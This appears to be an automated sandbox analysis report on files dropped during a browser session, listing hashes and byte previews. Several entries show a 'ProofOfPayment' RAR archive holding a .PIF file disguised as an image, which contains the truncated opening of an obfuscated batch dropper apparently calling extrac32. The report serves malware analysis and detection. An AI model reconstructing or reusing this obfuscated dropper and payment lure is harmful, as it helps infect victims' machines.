Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Xo.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Xw.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Xw.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Xw............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............o.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jun 26 04:51:48 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:dropped
Size (bytes):2677
Entropy (8bit):3.9908450177972923
Encrypted:false
SSDEEP:
MD5:703F3F38AB11725FBA94C49A2EEEE60D
SHA1:EE6381DD2F1F3C3766A7222E1B11B79E57B3F565
SHA-256:98DCFD831813B76B5AA634471B643911BD6638FE7AA2167FB20F6586416F9A57
SHA-512:70BBDCAA7FE88C56CD0FEC5A9F592AA420DE249B621B1E8FB7589E28E7D23AC6381E693971E1064128318EFD7E701A418CE245447DB9F78AF43AA4C59D48442D
Malicious:false
Reputation:unknown
Preview:L..................F.@.. ...$+.,.....Vj....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Xo.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Xw.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Xw.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Xw............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Xy............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............o.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jun 26 04:51:48 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:dropped
Size (bytes):2677
Entropy (8bit):3.9797602783372543
Encrypted:false
SSDEEP:
MD5:7E48D84181D1BECA732755ABEC734BC6
SHA1:16E8B901FECB12D77ED5F46EF8B44950E78DAEFA
SHA-256:31032560212FB12948D2079AF2CEC173364D26DD65C67D71F47267DE4FAE6F8A
SHA-512:A85B6BD90739B9F7F9C80EE2CA964C588182EC852B9A4ABD57F7A1EFACCC239653C0D79061F7D3EC380AD6135A5A99DAA72D8A741EAA007E992F7091782D2911
Malicious:false
Reputation:unknown
Preview:L..................F.@.. ...$+.,......t....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Xo.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Xw.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Xw.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Xw............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Xy............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............o.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jun 26 04:51:48 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:dropped
Size (bytes):2679
Entropy (8bit):3.9902743764435713
Encrypted:false
SSDEEP:
MD5:4A5EA83CE07177AAF9C75D3AE1FABF8A
SHA1:1B9E4854B218FA1FCD97752C47455DE2EFCDA2B2
SHA-256:0B7593DF7740F07F2C6ED64259BD509E9D4DA0058ECF0EFE483F8356A0A6E5EC
SHA-512:C6C6A1432B7438B9ADD11765C4252F06C1DB568B5A134268B71E18493494B9F3504B5D4295A664E9D115C64D5CB19B34285119CDD16C649BF8603865CF9662EE
Malicious:false
Reputation:unknown
Preview:L..................F.@.. ...$+.,....N.b....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Xo.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Xw.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Xw.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Xw............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Xy............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............o.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\Downloads\228dd3e1-4212-466f-ab4b-c49e5b0feb08.tmp

Download File
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:RAR archive data, v5
Category:dropped
Size (bytes):32419
Entropy (8bit):5.701283248857293
Encrypted:false
SSDEEP:
MD5:992226AD6A03D8C0FE5FA27BA9605F37
SHA1:8C1ADBE2435BDDC8B0C1D36E82AF8235F90069AA
SHA-256:E90CEAB5798757A44557E2DBDCC7FCB45C5F57418F96933D0F44052BA89862A4
SHA-512:49826F6B16AE2967B37F9D53389788AFA2C86195A1613F9B2FBF54D1AB4CC2A7715BB2814F89A3876586C8BDE1C42B6D536E1F26F2303F031E7DEBACE943948C
Malicious:false
Reputation:unknown
Preview:Rar!.....i..................4............ .......ProofOfPayment.PNG....J......PIFPIF@echo off..@%... . ... %e%........%c% .%h%..........%o% ..% %.%o% ...... %f%.%f%. .. %..C%.. .. ...%:% ....%\%.. ..%\%.%W%. ...... .%i%....%n%.%d%..%o%... .. %w%. ........%s%... ...%\%....%\%....... .%S%... . ...%y%... . ....%s%.. %t%... ...%e%. ..%m% .. ....%3%.....%2% ..%\%.. .%\%...%e%.... ..%x%.. . . %t%... ....%r%.......%a% .......%c%.........%3%. .... .%2%.... .. % % . .%/%.... %C%. ..% %.%/% .%Y%... % %... . ...%C% ....%:%....... .%\%..%\%..%W%........%i% ........ %n%....%d%......%o%.. . .....%w%. .....%s%..%\%...%\% ... ....%S%..... ..%y%...%s%.. ...%t%..%e%.%m%...%3%........

C:\Users\user\Downloads\ProofOfPayment (1).TAR (copy)

Download File
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:RAR archive data, v5
Category:dropped
Size (bytes):0
Entropy (8bit):0.0
Encrypted:false
SSDEEP:
MD5:467C4B46599E652F6AC1FB8582281338
SHA1:3067144FA45305A1E9F699DB7732C06C75CED38D
SHA-256:3F68B4B529928AF28F4C63113CFC132BCBE10E99883138105978BD1E3E0759F1
SHA-512:BB6ECE0CD9A98D2F51B231159D4539612EF28609D709C23DDED478B8382E1EA1E5FBB7D7A5FF04679E4843C39F04065038691CBFC66330C229F6BC6CE06ECF31
Malicious:false
Reputation:unknown
Preview:Rar!.....i..................4............ .......ProofOfPayment.PNG....J......PIFPIF@echo off..@%... . ... %e%........%c% .%h%..........%o% ..% %.%o% ...... %f%.%f%. .. %..C%.. .. ...%:% ....%\%.. ..%\%.%W%. ...... .%i%....%n%.%d%..%o%... .. %w%. ........%s%... ...%\%....%\%....... .%S%... . ...%y%... . ....%s%.. %t%... ...%e%. ..%m% .. ....%3%.....%2% ..%\%.. .%\%...%e%.... ..%x%.. . . %t%... ....%r%.......%a% .......%c%.........%3%. .... .%2%.... .. % % . .%/%.... %C%. ..% %.%/% .%Y%... % %... . ...%C% ....%:%....... .%\%..%\%..%W%........%i% ........ %n%....%d%......%o%.. . .....%w%. .....%s%..%\%...%\% ... ....%S%..... ..%y%...%s%.. ...%t%..%e%.%m%...%3%........

C:\Users\user\Downloads\ProofOfPayment (1).TAR.crdownload (copy)

Download File
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:RAR archive data, v5
Category:dropped
Size (bytes):0
Entropy (8bit):0.0
Encrypted:false
SSDEEP:
MD5:467C4B46599E652F6AC1FB8582281338
SHA1:3067144FA45305A1E9F699DB7732C06C75CED38D
SHA-256:3F68B4B529928AF28F4C63113CFC132BCBE10E99883138105978BD1E3E0759F1
SHA-512:BB6ECE0CD9A98D2F51B231159D4539612EF28609D709C23DDED478B8382E1EA1E5FBB7D7A5FF04679E4843C39F04065038691CBFC66330C229F6BC6CE06ECF31
Malicious:false
Reputation:unknown
Preview:Rar!.....i..................4............ .......ProofOfPayment.PNG....J......PIFPIF@echo off..@%... . ... %e%........%c% .%h%..........%o% ..% %.%o% ...... %f%.%f%. .. %..C%.. .. ...%:% ....%\%.. ..%\%.%W%. ...... .%i%....%n%.%d%..%o%... .. %w%. ........%s%... ...%\%....%\%....... .%S%... . ...%y%... . ....%s%.. %t%... ...%e%. ..%m% .. ....%3%.....%2% ..%\%.. .%\%...%e%.... ..%x%.. . . %t%... ....%r%.......%a% .......%c%.........%3%. .... .%2%.... .. % % . .%/%.... %C%. ..% %.%/% .%Y%... % %... . ...%C% ....%:%....... .%\%..%\%..%W%........%i% ........ %n%....%d%......%o%.. . .....%w%. .....%s%..%\%...%\% ... ....%S%..... ..%y%...%s%.. ...%t%..%e%.%m%...%3%........

C:\Users\user\Downloads\ProofOfPayment.TAR (copy)

Download File
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:RAR archive data, v5
Category:dropped
Size (bytes):0
Entropy (8bit):0.0
Encrypted:false
SSDEEP:
MD5:97A3929FBA5E3B85E9E81E55F6743DD3
SHA1:8429B682719303B70F863CAB44A2D5EA4BB44D99
SHA-256:6578527E4A51AD1D8DD78E8B42DCAFBEE0A2C158CD6A1794DCBBEB5DF7321372
SHA-512:33F220EEFA3A24CE77C80D6389FF4CD1A59505BD958C7BE939F156762770A1B88F3519C072835E5894B54C1AA356E0DD0CC8EE6F3AED477490364398C5314708
Malicious:false
Reputation:unknown
Preview:Rar!.....i..................4............ .......ProofOfPayment.PNG....J......PIFPIF@echo off..@%... . ... %e%........%c% .%h%..........%o% ..% %.%o% ...... %f%.%f%. .. %..C%.. .. ...%:% ....%\%.. ..%\%.%W%. ...... .%i%....%n%.%d%..%o%... .. %w%. ........%s%... ...%\%....%\%....... .%S%... . ...%y%... . ....%s%.. %t%... ...%e%. ..%m% .. ....%3%.....%2% ..%\%.. .%\%...%e%.... ..%x%.. . . %t%... ....%r%.......%a% .......%c%.........%3%. .... .%2%.... .. % % . .%/%.... %C%. ..% %.%/% .%Y%... % %... . ...%C% ....%:%....... .%\%..%\%..%W%........%i% ........ %n%....%d%......%o%.. . .....%w%. .....%s%..%\%...%\% ... ....%S%..... ..%y%...%s%.. ...%t%..%e%.%m%...%3%........

C:\Users\user\Downloads\ProofOfPayment.TAR.crdownload

Download File
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:RAR archive data, v5
Category:dropped
Size (bytes):3002119
Entropy (8bit):4.943104401676843
Encrypted:false
SSDEEP:
MD5:97A3929FBA5E3B85E9E81E55F6743DD3
SHA1:8429B682719303B70F863CAB44A2D5EA4BB44D99
SHA-256:6578527E4A51AD1D8DD78E8B42DCAFBEE0A2C158CD6A1794DCBBEB5DF7321372
SHA-512:33F220EEFA3A24CE77C80D6389FF4CD1A59505BD958C7BE939F156762770A1B88F3519C072835E5894B54C1AA356E0DD0CC8EE6F3AED477490364398C5314708
Malicious:false
Reputation:unknown
Preview:Rar!.....i..................4............ .......ProofOfPayment.PNG....J......PIFPIF@echo off..@%... . ... %e%........%c% .%h%..........%o% ..% %.%o% ...... %f%.%f%. .. %..C%.. .. ...%:% ....%\%.. ..%\%.%W%. ...... .%i%....%n%.%d%..%o%... .. %w%. ........%s%... ...%\%....%\%....... .%S%... . ...%y%... . ....%s%.. %t%... ...%e%. ..%m% .. ....%3%.....%2% ..%\%.. .%\%...%e%.... ..%x%.. . . %t%... ....%r%.......%a% .......%c%.........%3%. .... .%2%.... .. % % . .%/%.... %C%. ..% %.%/% .%Y%... % %... . ...%C% ....%:%....... .%\%..%\%..%W%........%i% ........ %n%....%d%......%o%.. . .....%w%. .....%s%..%\%...%\% ... ....%S%..... ..%y%...%s%.. ...%t%..%e%.%m%...%3%........

C:\Users\user\Downloads\c99ad211-d557-443e-86bc-05c66797862a.tmp

Download File
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:RAR archive data, v5
Category:dropped
Size (bytes):2097152
Entropy (8bit):4.943936969621154
Encrypted:false
SSDEEP:
MD5:467C4B46599E652F6AC1FB8582281338
SHA1:3067144FA45305A1E9F699DB7732C06C75CED38D
SHA-256:3F68B4B529928AF28F4C63113CFC132BCBE10E99883138105978BD1E3E0759F1
SHA-512:BB6ECE0CD9A98D2F51B231159D4539612EF28609D709C23DDED478B8382E1EA1E5FBB7D7A5FF04679E4843C39F04065038691CBFC66330C229F6BC6CE06ECF31
Malicious:false
Reputation:unknown
Preview:Rar!.....i..................4............ .......ProofOfPayment.PNG....J......PIFPIF@echo off..@%... . ... %e%........%c% .%h%..........%o% ..% %.%o% ...... %f%.%f%. .. %..C%.. .. ...%:% ....%\%.. ..%\%.%W%. ...... .%i%....%n%.%d%..%o%... .. %w%. ........%s%... ...%\%....%\%....... .%S%... . ...%y%... . ....%s%.. %t%... ...%e%. ..%m% .. ....%3%.....%2% ..%\%.. .%\%...%e%.... ..%x%.. . . %t%... ....%r%.......%a% .......%c%.........%3%. .... .%2%.... .. % % . .%/%.... %C%. ..% %.%/% .%Y%... % %... . ...%C% ....%:%....... .%\%..%\%..%W%........%i% ........ %n%....%d%......%o%.. . .....%w%. .....%s%..%\%...%\% ... ....%S%..... ..%y%...%s%.. ...%t%..%e%.%m%...%3%........

Chrome Cache Entry: 304

Download File
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text, with very long lines (3393)
Category:downloaded
Size (bytes):3398
Entropy (8bit):5.841132690075435
Encrypted:false
SSDEEP:
MD5:9068DDA4E464B2D2991F5113BBD89CAB
SHA1:A6576AD451DFA6C6620FE4B2CA6F12BBFE9C4C33
SHA-256:26951185A22E6DDB2376B2F58BA891DC5214A513A70EECFAE8233E89DE3BF6A9
SHA-512:C66D520B1C2F97569C34096F6BF4B03F7026224C4063507B23E8A8BEE26F94FFA3E4F5FE21A53A3E2310DBDAF662D81988B72DEC1CF4A7C4497B8B5C8DBFAA62
Malicious:false
Reputation:unknown
URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:)]}'.["",["argentina vs chile soccer copa america","farming simulator 25","ffxiv maintenance","nvidia stocks","boeing starliner astronauts stuck","the bear season 3 release date","alex meruelo arizona coyotes","cdk global cyber attacks"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"CgovbS8waDNuOG1yEjVBbGV4IE1lcnVlbG8g4oCUIEN1YmFuLUFtZXJpY2FuIGJ1c2luZXNzIHByb2Zlc3Npb25hbDLXDWRhdGE6aW1hZ2UvanBlZztiYXNlNjQsLzlqLzRBQVFTa1pKUmdBQkFRQUFBUUFCQUFELzJ3Q0VBQWtHQndnSEJna0lCd2dLQ2drTERSWVBEUXdNRFJzVUZSQVdJQjBpSWlBZEh4OGtLRFFzSkNZeEp4OGZMVDB0TVRVM09qbzZJeXMvUkQ4NFF6UTVPamNCQ2dvS0RRd05HZzhQR2pjbEh5VTNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTi8vQUFCRUlBRUFBUUFNQklnQUNFUUVERVFIL3hBQWJBQUFDQXdFQkFRQUFBQUFBQUFBQUFBQURCUUlFQmdjQkFQL0VBRFlRQUFJQk

Static File Info

No static file info